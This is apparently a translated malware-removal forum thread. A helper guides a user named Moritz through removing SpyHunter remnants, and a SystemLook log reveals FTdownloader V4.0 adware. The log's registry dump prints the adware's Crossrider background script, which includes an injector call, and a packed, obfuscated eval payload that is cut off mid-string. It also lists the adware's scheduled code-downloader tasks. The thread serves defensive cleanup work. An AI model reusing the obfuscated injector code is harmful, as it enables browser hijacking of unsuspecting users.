"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayIcon"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"

-= EOF =-


cosinus 13.08.2013 09:44

Remove SpyHunter

The following file will help you uninstall the program completely:
  • Please download the following program to your desktop: SpyHunterKiller.exe
  • Confirm the warning and click "Weiter" (Next).
  • Report whether you can still see any remnants of SpyHunter.


Please also repeat the step with SystemLook and post the new results.

Minter 13.08.2013 12:00

Under Control Panel -> Programs and Features I found something named SpyHunter again. It doesn't have the SpyHunter icon, though.

Code:

SystemLook 30.07.11 by jpshortstuff
Log created at 10:48 on 13/08/2013 by Moritz
Administrator - Elevation successful

========== filefind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll        --a---- 393216 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe        --a---- 338432 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll        --a---- 473088 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe        --a---- 442880 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-helper.exe        --a---- 311808 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0.ico        --a---- 9662 bytes        [11:19 30/06/2013]        [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk        --a---- 726 bytes        [07:36 13/08/2013]        [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader        --a---- 4256 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler        --a---- 4166 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater        --a---- 4262 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job        --a---- 1226 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] 3FB5E9A85AA0F499D86530241DACB64B
C:\Windows\Tasks\FTdownloader V4.0-enabler.job        --a---- 1136 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] FF2CF9A43027FE63CBF838105BF502B4
C:\Windows\Tasks\FTdownloader V4.0-updater.job        --a---- 1232 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] F62D368B093CC484B99E203338E25C37

Searching for "*Spyhunter*"
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\SpyHunter.lnk        --a---- 12130 bytes        [13:26 12/08/2013]        [13:26 12/08/2013] 7FB1162DAB9E2DA90C88CCECD0C87808
C:\Users\Moritz\Downloads\SpyHunterKiller.exe        ------- 463693 bytes        [08:46 13/08/2013]        [08:46 13/08/2013] 82717E3F11623215BE019760252C4E03
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf        --a---- 165806 bytes        [17:24 27/07/2013]        [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8

========== folderfind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0        d------        [12:15 26/07/2013]
C:\Users\Moritz\AppData\Local\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou        d------        [12:15 26/07/2013]

Searching for "*Spyhunter*"
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]

========== regfind ==========

Searching for "FTdownloader"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==\\\"0\\\"){4S()}1O if(a.2V!=\\\"1\\\"||
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
@="FTDownloader URI"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
"Content Type"="application/x-FTDownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\DefaultIcon]
@="C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\shell\open\command]
@=""C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe" /u="%1""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FTdownloader V4.0]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp]
"path"="C:\Program Files (x86)\FTDownloader.com\FTDownloader10.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
